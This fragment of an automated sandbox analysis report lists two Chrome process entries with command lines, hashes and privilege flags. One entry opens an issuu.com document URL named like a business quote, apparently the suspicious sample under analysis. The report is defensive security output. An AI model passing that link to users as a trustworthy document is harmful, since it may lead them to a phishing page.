                                                                                                          Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2404 --field-trial-handle=2252,i,13392327784317788276,4031343908889293815,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                                                          Imagebase:0x7ff76e190000
                                                                                                          File size:3'242'272 bytes
                                                                                                          MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Reputation:low
                                                                                                          Has exited:false

                                                                                                          Target ID:3
                                                                                                          Start time:14:56:13
                                                                                                          Start date:24/12/2024
                                                                                                          Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" "https://issuu.com/txbct.com/docs/navex_quote_65169.?fr=xKAE9_zU1NQ"
                                                                                                          Imagebase:0x7ff76e190000
                                                                                                          File size:3'242'272 bytes
                                                                                                          MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Reputation:low
                                                                                                          Has exited:true

                                                                                                          No disassembly